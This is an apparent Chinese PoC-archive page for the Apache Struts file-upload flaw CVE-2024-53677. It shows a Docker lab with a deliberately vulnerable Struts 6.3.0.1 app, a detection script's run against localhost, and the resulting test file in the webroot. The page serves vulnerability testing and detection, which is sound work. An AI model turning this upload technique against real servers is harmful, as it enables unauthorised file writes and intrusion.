关联漏洞
标题:
Apache Struts 安全漏洞
(CVE-2024-53677)
描述:Apache Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 Apache Struts 2.0.0版本至6.4.0之前版本存在安全漏洞,该漏洞源于文件上传逻辑缺陷。
介绍
# Proof-of-Concept
## Setup test environment
```bash
» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
» sudo docker run -p 8081:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name struts-6.3.0.1 struts-6.3.0.1
```
```html
» curl http://127.0.0.1:8081/upload.action
<html>
<head>
<title>File upload</title>
</head>
<body>
<h1>Apache Struts 6.3.0.1</h1>
<p>Welcome to Apache Struts 6.3.0.1 lab. This application is vulnerable to CVE-2023-50164 and CVE-2024-53677.</p>
<form id="upload" name="upload" action="/upload.action;jsessionid=196954CE343A603EC7EE26FFF611D302" method="post" enctype="multipart/form-data">
<table class="wwFormTable">
<tr>
<td class="tdLabel"></td>
<td
class="tdInput"
><input type="file" name="upload" id="upload_upload"/></td>
</tr>
<tr>
<td colspan="2">
<div class="formButton"><input type="submit" value="Submit" id="upload_0"/></div>
</td>
</tr>
</table>
</form>
</body>
</html>
```
---
## Exploit
```bash
» curl http://127.0.0.1:8081/vuln_test.txt
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>
» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.
» curl http://127.0.0.1:8081/vuln_test.txt
CVE-2024-53677 / S2-067 detection test.
» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan 7 11:23 .
drwxr-xr-x 1 root root 4096 Jan 7 11:18 ..
drwxr-x--- 2 root root 4096 Jan 7 11:14 forbidden
-rw-r----- 1 root root 226 Jan 7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan 7 11:14 META-INF
-rw-r----- 1 root root 39 Jan 7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan 7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt
CVE-2024-53677 / S2-067 detection test.
```
Check script from: https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK
文件快照
[4.0K] /data/pocs/2d3700ef2b4fbeee9e4dca29dcd8e4a6e1f6e5f9
├── [2.7K] check.py
├── [1.3K] context.xml
├── [ 561] Dockerfile
├── [3.4K] README.md
├── [4.0K] struts-app
│ ├── [8.9K] mvnw
│ ├── [5.7K] mvnw.cmd
│ ├── [3.7K] pom.xml
│ └── [4.0K] src
│ └── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] org
│ │ └── [4.0K] trackflaw
│ │ └── [4.0K] example
│ │ └── [2.2K] Upload.java
│ ├── [4.0K] resources
│ │ └── [ 870] struts.xml
│ └── [4.0K] webapp
│ ├── [4.0K] forbidden
│ ├── [ 226] index.html
│ └── [4.0K] WEB-INF
│ ├── [ 579] error.jsp
│ ├── [ 650] success.jsp
│ ├── [ 716] upload.jsp
│ └── [1.1K] web.xml
└── [ 219] tomcat-users.xml
11 directories, 15 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。